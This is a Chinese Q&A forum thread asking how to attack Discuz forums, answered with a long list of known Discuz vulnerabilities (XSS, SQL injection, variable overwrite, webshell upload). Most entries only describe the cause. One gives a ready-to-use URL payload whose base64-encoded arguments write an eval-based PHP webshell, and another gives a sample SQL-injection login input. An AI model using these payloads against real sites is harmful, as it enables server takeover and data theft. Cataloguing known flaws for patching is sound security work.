Discuz论坛有哪些入侵渗透手段?


有相当一部分用户使用Discuz搭建论坛。以前的版本漏洞也相当多,如今还有哪些较新版本存在漏洞,怎么利用?

漏洞挖掘 网络安全 讨论 Discuz!X

蛛丝马迹ne 12 years, 4 months ago

最近在整改BBS,顺便找了一下公开的漏洞,还是比较多的,看到这些,基本都是对输入的校验不够严格引起的,于是想到了自己的代码,得赶紧去检查优化。

   
  Discuz! 6.x/7.x 全局变量防御绕过漏洞  由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞.
  

Discuz! admin\styles.inc.php get-webshell bug 由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞.

Discuz!<5.50 $onlineipmatches 未初始化漏洞 由于Discuz!<5.50的common.inc.php使用preg_match()的变量$onlineipmatches 未初始化漏洞,导致可以容易构造$onlineip

Discuz! 1_modcp_editpost.tpl.php xss bug 由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个xss漏洞.

Discuz! admin\database.inc.php get-webshell bug 由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.

Discuz! Reset User Password Vulnerability 由于Discuz! 的 随机数使用的播种缺陷,在找会用户密码时可以暴力得到id的随机hash,从而导致容易修改用户密码的严重漏洞.

Discuz! $_DCACHE数组变量覆盖漏洞 [update 11.14] 由于Discuz! 的wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题.

Discuz! 路径信息泄露 bug 由于Discuz! cache file的数组$_DCACHE,$_CACHE等的变量名没有初始化导致路径信息泄露.

Discuz! member.php xss bug 由于Discuz!的member.php对$listgid并没有初始化导致一个严重的xss bug.

Discuz! admin\runwizard.inc.php get-webshell bug 由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.

Discuz! modcp\moderate.inc.php 数据库注射bug 由于Discuz!的modcp/moderate.inc.php里$fidadd数组变量没有初始化导致sql注射bug

Discuz! moderation.inc.php 数据库'注射' bug 由于Discuz!的include/moderation.inc.php存在一个'二次攻击'导致数据库'注射'的bug

Discuz! trade.php 数据库'注射' bug 由于Discuz!的trade.php里的$message处理不严格导致引起数据库操作错误,通过SODB-2008-06而导致xss攻击及数据库信息泄露的漏洞.

Discuz! 数据库错误信息xss bug 由于Discuz!在处理数据库的错误信息时对$GLOBALS['PHP_SELF']没有过滤,导致在让数据库出错的情况下导致xss攻击.

Discuz!4.x wap\index.php 变量覆盖漏洞 由于Discuz!的wap\index.php处理post的变量不严谨而导致变量覆盖,从而可能导致sql注射/代码执行/xss等攻击.

Discuz! cache.func.php信息泄漏的bug 由于Discuz!的\include\cache.func.php缺少访问限制导致版本及补丁消息的泄露.

Discuz! flash Crsf bug 由于Discuz!对flash跨域策略文件及上传图片文件处理不严导致可以绕过formhash及Referer的限制,导致csrf攻击.

Discuz! admincp.php xss bug 由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug.

Discuz![flash] xss bug 由于Discuz!对上传图片文件处理不严及flash标签安全设置不严导致一个严重的xss bug.

Discuz 6.x—7.x:WAP高危漏洞,wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题

Discuz 7.0-7.2:后台settings.inc.php中写shell漏洞

Discuz 7.1-7.2:showmessage bug,利用方式:misc.php?action=imme_binding&response;[result]=aa:b&scriptlang;[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

Discuz 7.2:SQL注入漏洞/manyou/sources/notice.php

Discuz 7.2代码执行漏洞

Discuz! x1-1.5 SQL 注入 GetShell EXP

Discuz! X1-1.5 notify_credit.php 页面SQL注入漏洞

Discuz! 1.5 跨站脚本攻击漏洞 UC登陆页面存在跨站漏洞

DiscuzX1.5 门户管理权限SQL注入BUG

DZ-X1.5 论坛后台拿WebShell

discuz x1.5&discuz; 7.2 后台getshell 0day

DISCUZ X1.5 本地文件包含漏洞

Discuz! X2:SQL注入漏洞source\module\forum\forum_attachment.php

Discuz! X2:SQL注入member.php?mod=logging&action;=login,提交username=1+and+1=1

Discuz!NT 2.x - 3.5.2 SQL注入(0day)

Discuz!NT3.5.2文件编辑0Day获取Webshell

寂静D旋律〤 answered 12 years, 4 months ago

Your Answer